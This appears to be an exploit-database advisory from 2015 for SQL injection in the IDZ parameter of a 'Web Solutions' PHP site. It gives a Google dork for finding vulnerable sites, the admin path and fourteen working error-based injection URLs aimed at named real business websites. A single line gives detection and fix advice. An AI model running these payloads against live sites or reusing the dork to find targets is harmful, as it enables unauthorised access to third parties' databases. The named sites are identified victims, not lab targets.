######################
# Exploit Title : Web Solutions SQL injection (IDZ parameter of products.php / categories.php)
# Exploit Author : Ashiyane Digital Security Team
# Vendor Homepage : http://www.websolutions.pk/
# Google Dork : "Designed & Developed By: Web Solutions" inurl:products.php
# Date: 23 Dec 2015
# Tested On : Win 10 / Google Chrome
#
######################
# Admin page : <target>/admincp/
#
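# Demos (error-based: the quote in IDZ ends the SQL string literal, and extractvalue() then returns @@version inside the MySQL XPATH error message) :
# Detection / fix : log and alert on IDZ values containing a quote, extractvalue( or a /*!50000 ... */ versioned comment; bind IDZ as a query parameter instead of building the SQL string from it.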
# http://www.unitruthsports.com/products.php?IDZ=0-0-0-0-2%27%20and%20extractvalue(0x0a,CONCAT%20(0x0a,(/*!50000select*/@@version)))%20%23
# http://www.turf-sports.com/products.php?IDZ=0-0-0-0-2%27%20and%20extractvalue(0x0a,CONCAT%20(0x0a,(/*!50000select*/@@version)))%20%23
# http://www.sterntextiles.com/products.php?IDZ=0-0-0-102-1%27%20and%20extractvalue(0x0a,CONCAT%20(0x0a,(/*!50000select*/@@version)))%20%23
# http://www.deobody.com/products.php?IDZ=0-0-0-124-2lng=en%27%20and%20extractvalue(0x0a,CONCAT%20(0x0a,(/*!50000select*/@@version)))%20%23
# http://www.davisonsports.com/products.php?IDZ=0-0-0-137-4%27%20and%20extractvalue(0x0a,CONCAT%20(0x0a,(/*!50000select*/@@version)))%20%23
# http://www.virco.co.uk/products.php?IDZ=0-0-0-0-15%27%20and%20extractvalue(0x0a,CONCAT%20(0x0a,(/*!50000select*/@@version)))%20%23
# http://www.aditeks.com/products.php?IDZ=0-0-0-110-3%27%20and%20extractvalue(0x0a,CONCAT%20(0x0a,(/*!50000select*/@@version)))%20%23
# http://www.welmotind.com/products.php?IDZ=0-0-0-0-8%27%20and%20extractvalue(0x0a,CONCAT%20(0x0a,(/*!50000select*/@@version)))%20%23
# http://www.lilosports.com/products.php?IDZ=0-0-0-120-4%27%20and%20extractvalue(0x0a,CONCAT%20(0x0a,(/*!50000select*/@@version)))%20%23
# http://www.razafilters.com/categories.php?IDZ=0-0-0-0-5%27%20and%20extractvalue(0x0a,CONCAT%20(0x0a,(/*!50000select*/@@version)))%20%23
# http://www.plaminternational.com/products.php?IDZ=0-0-0-123-2%27%20and%20extractvalue(0x0a,CONCAT%20(0x0a,(/*!50000select*/@@version)))%20%23
# http://www.realmlordintl.com/products.php?IDZ=0-0-0-121-2%27%20and%20extractvalue(0x0a,CONCAT%20(0x0a,(/*!50000select*/@@version)))%20%23
# http://www.ipimpex.com/products.php?IDZ=0-0-0-0-34%27%20and%20extractvalue(0x0a,CONCAT%20(0x0a,(/*!50000select*/@@version)))%20%23
# http://www.megaziz.com/products.php?IDZ=0-0-0-134-6%27%20and%20extractvalue(0x0a,CONCAT%20(0x0a,(/*!50000select*/@@version)))%20%23
######################
# discovered by : modiret
######################